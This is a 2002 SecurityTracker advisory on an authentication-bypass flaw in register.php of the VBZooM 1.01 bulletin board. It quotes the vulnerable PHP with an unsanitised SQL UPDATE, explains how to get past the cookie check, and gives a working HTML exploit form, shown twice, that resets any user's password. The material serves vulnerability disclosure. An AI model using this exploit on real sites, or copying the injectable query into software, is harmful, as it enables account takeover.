SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Forum/Board/Portal)  >   VBZooM Vendors:   Vbzoom.com
VBZooM Bulletin Board Bug in 'register.php' Lets Remote Users Reset Other User Passwords
SecurityTracker Alert ID:  1005387
SecurityTracker URL:  http://securitytracker.com/id/1005387
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Oct 8 2002
Impact:   Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 1.01
Description:   A vulnerability was reported in the VBZooM PHP-based bulletin board. A remote user can reset a target user's password.

It is reported that the vulnerability resides in the 'register.php' file. According to the report, a remote user can submit a specially crafted request to bypass the authentication process and reset a target user's password.

A demonstration exploit form is provided:

<form name="f1" action="http://[targetserver]/vbzoom/register.php" method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form>

Impact:   A remote user can bypass the authentication process and reset a target user's password.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.vbzoom.com/ (Links to External Site)
Cause:   Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  Reset any user's password in VBZoom forums




Name:    VBZoom
Version Affected:  tested on v1.01 maybe other version vulnerable also
Severity:  Critical
Category: Password reset
Vendor URL:   http://www.vbzoom.com
Author:   hish_hish <hish_hish565@hotmail.com>
Date:   discloused on 28th August 2002
         Published at 8th oct 2002

Description
***********
VBZooM is bulletin board system which written in php,
the problem lay on sql query in file register.php.
and you can reset any user's password (see Details).
 
 
Details
*******
see these few lines from register.php:
1: If ($ChangeProfile==1 And ($VBZooMForumCookiesUserName=="" or 
2: $VBZooMForumCookiesUserName=="deleted"))
3: {
4: include("admin/config.php");
5: include("style/style.php");
6: Echo"<BR>";
 :
 :
9: include("login.php");   // wooow here will catch us, so we want to pass 
this block.
 :
 :
10: Exit();
11: }
 :
 :
14: if ($REQUEST_METHOD=="POST")
15: {
16: if($ChangeProfile==1 And $UserName!="")
17: {
18: include("admin/config.php");
19: $Connect =mysql_connect($DBHostName,$DBUserName,$DBPassword);
20: $Select =mysql_select_db($DBName,$Connect);
 :
 :
 :
24: $Sql = "UPDATE Member Set Password='$Password',Email='$Email',
      Gender='$Gender',Style='1',HomePage='$HomePage',Photo='$Photo',
       Icq='$Icq',Hotmail='$Hotmail',
      
Yahoo='$Yahoo',BirthDate='$BirthDate',Country='$Country',Hobby='$Hobby',
       Job='$Job',Signature='$Signature',AllowEmail='$AllowEmail',
      AllowMail='$AllowMail',AllowMessage='$AllowMessage',
      AllowMailCaseMessage='$AllowMailCaseMessage' where 
UserName='$UserName'";
31: $Result = mysql_query($Sql);
32: If ($Result)
 {
34: setcookie ("VBZooMForumCookiesUserName","$UserName",time()+604800);
35: setcookie ("VBZooMForumCookiesPassword", "$Password",time()+604800);

we don't want to execute the block between line 3 and 11 so we pass 
invalid values to if statment (line 1).
the lame sql statment lies at line 24 , and it's inside the block (line 14 
and 35).
so we will pass valid values to reach the sql statment as follow:
   make <form method="POST" action="register.php">  // to enter block in 
line 14
   assigne 1 to variable $ChangeProfile, and victim UserName to reset his 
password
   lines 18 - 20 no comment !!
   lines 24 - 35  :)
 
 
Exploit code
**************
<form name="f1" action="http://www.victim.com/vbzoom/register.php" 
method="POST">
<input type="hidden" name="ChangeProfile" value="1">
User Name: <input type="text" name="UserName"><br>
Password: <input type="text" name="Password"><br>
Email: <input type="text" name="Email">
<input type="hidden" name="HomePage" value="lamerZ">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="hidden" name="VBZooMForumCookiesUserName" value="false">
<input type="submit" value="reset password">
</form>
   
 
Fix Information
***************
Contact http://www.vbzoom.com

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC